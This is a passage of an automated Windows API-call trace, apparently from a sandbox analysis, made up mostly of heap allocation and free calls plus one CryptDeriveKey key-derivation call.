lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0268.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0268.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14038 | out: hHeap=0x970000) returned 1 [0268.828] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0268.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0268.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0268.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0268.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0268.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0268.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0268.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0268.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0268.829] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0268.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51dc0 [0268.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.829] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0268.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0268.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0268.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0268.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0268.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0268.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0268.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0268.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.830] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0268.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0268.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51dc0 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.831] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0268.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0268.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0268.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0268.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0268.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0268.832] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0268.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0268.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0268.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0268.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0268.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0268.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0268.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0268.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f88 | out: hHeap=0x970000) returned 1 [0268.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f10 [0268.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0268.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0268.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fe8 [0268.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0268.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fe8 | out: hHeap=0x970000) returned 1 [0268.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0268.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0268.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f28 [0268.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52168 [0268.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f28 | out: hHeap=0x970000) returned 1 [0268.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52168 | out: hHeap=0x970000) returned 1 [0268.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0268.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0268.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0268.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e520a8 [0268.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e520a8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0268.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0268.834] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0268.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0268.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0268.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0268.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0268.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0268.835] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa872d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87490) returned 1 [0268.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0268.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0268.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52048 [0268.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0268.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ee0 [0268.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0268.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ee0 | out: hHeap=0x970000) returned 1 [0268.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0268.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0268.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0268.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0268.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0268.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0268.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0268.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52078 [0268.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0268.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0268.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0268.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0268.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0268.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52030 [0268.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0268.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52030 | out: hHeap=0x970000) returned 1 [0268.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52180 [0268.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0268.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0268.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fa0 | out: hHeap=0x970000) returned 1 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f88 | out: hHeap=0x970000) returned 1 [0268.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521b0 [0268.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0268.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0268.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: 